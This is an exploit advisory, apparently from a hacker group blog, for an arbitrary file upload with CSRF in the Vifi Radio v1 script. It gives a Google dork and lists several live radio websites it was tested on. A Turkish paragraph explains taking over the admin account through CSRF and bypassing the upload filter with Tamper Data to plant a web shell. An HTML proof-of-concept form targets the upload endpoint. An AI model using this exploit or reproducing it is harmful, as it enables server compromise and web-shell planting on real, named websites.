.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com [~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker, Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Vifi Radio |~Affected Version : v1 |~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html |~Official Demo : http://radyo.vifibilisim.com |~RISK : Medium |~DORK : inurl:index.asp?radyo=2 |~Tested On : [L] Windows 7, Mozilla Firefox ######################################################## Tested on; http://radyo.vifibilisim.com www.radyoimza.com www.bayraklifm.com www.istanbulfm.net www.gaziantepfurkanradyo.com http://iskenderunfm.com ---------------------------------------------------------- BİLGİ : Scriptte daha önce keÅŸfedilmiÅŸ olan CSRF Zaafiyeti Kullanarak Admin Åžifresi deÄŸiÅŸtirilir ve panele giriÅŸ yapılır. AÅŸağıda verilen PoC kodlar, "Tamper Data" EÅŸliÄŸinde Upload süzgecini bypass etmek için kullanıldığında zararlı yazılım doÄŸrudan sunucuya yüklenebilir. Yüklenen Shell Dosyasının sunucudaki yerini "Tamper Data" zaten iletim esnasında yakalayacaktır. Alternatif olarak "Anasayfa" üzerinde aÅŸağıda yer alan "Djler" bölümünden shell dosyasının izi sürülebilir. Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php ---------------------------------------------------------- Upload.HTML ----------------------------------------------------------- <td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue"> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td> </tr> <tr> <td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main"> <input name="fmsubmit" type="submit" class="main" value="YÜKLE" /></td> </tr> </table> </form></td> </tr> </table></td> </tr> ############################ "Admin Panel: /yonetim " ############################